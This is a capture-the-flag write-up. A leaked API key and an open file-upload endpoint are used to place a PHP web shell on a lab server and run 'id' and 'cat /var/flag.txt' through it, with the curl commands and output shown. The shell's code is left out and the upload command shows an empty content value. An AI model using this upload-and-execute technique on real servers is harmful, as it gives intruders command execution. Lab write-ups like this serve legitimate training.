Smart Bike (Smart City, 250p)

After making it to the council you speak with the local IT administrators.
They are impressed with your skills and want your help in a security audit.
An exposed API endpoint could be exposing some sensitive information on the city's new Smart Bike infrastructure.
Can you take a look and see if there are any security issues that can be fixed?
Find a way to abuse the functionality of an exposed API endpoint and retrieve the flag from /var/flag.txt
The only thing we know is the exposed IP address (http://envXXX.target03:8000/).

solution

Website contains simple text and nothing more. 

SmartBike API

Checking /robots.txt reveals hidden config file. 

User-Agent: *
Disallow: /js/config.js

Checking /js/config.js reveals application source. 

<scrip>
    /* Smart Bike API conf, only POST method allowed! */  

    //key
    config.apiKey= "37e4950e-d638-4e9f-9fe1-56baac1b85f2";
    
    //endpoint 
    const api = "/api";
    
    //default upl path
    const path = "/upl";

    //method list
    require([
    	//create -> filename + content  
     	"config/create", 
	//delete -> location + filename (not working, permissions must be fixed)
     	"config/delete",
	//update -> location + filename + content (not working, permissions must be fixed)
     	"config/update" 
    ]);
    
    //responses
    const successCreate   = "Success on file upload!";
    const successDelete   = "Success on file delete!";
    const successUpdate   = "Success on file update!";
    const missingMethod   = "Method is missing or disabled!";
    const missingParameters = "Missing parameter(s)!";
    const error		  = "Unknown error!"; //must be updated with status codes
    const apiKey	  = "Provide apiKey!";
</script>

There is API key and some API methods. Basically, API is working as a upload function, which stores files in /upl directory.

As server is running PHP (revealed by HTTP headers), idea is to upload malicious PHP file and exploit it.

Trying the API and providing necessary parameters by trial-and-error. 

# curl 'http://envXXX.target03:8000/api/?apiKey=37e4950e-d638-4e9f-9fe1-56baac1b85f2' -d ''
Provide apiKey!
curl 'http://envXXX.target03:8000/api/' -d 'apiKey=37e4950e-d638-4e9f-9fe1-56baac1b85f2'
Method is missing or disabled!
# curl 'http://envXXX.target03:8000/api/' -d 'apiKey=37e4950e-d638-4e9f-9fe1-56baac1b85f2&method=create'
Missing parameter(s)!
Check for configuration...

Upload pwn.php via API. 

# curl 'http://envXXX.target03:8000/api/' -d 'apiKey=37e4950e-d638-4e9f-9fe1-56baac1b85f2&method=create&filename=pwn.php&content='
Success on file write!

Retrieving the flag. 

# curl 'http://envXXX.target03:8000/upl/pwn.php' -d '1=id'
uid=33(www-data) gid=33(www-data) groups=33(www-data)
# curl 'http://envXXX.target03:8000/upl/pwn.php' -d '1=cat /var/flag.txt'
Flag: ctf-tech{757422a2-67e2}

Flag is ctf-tech{757422a2-67e2}.

Buy Me A Coffee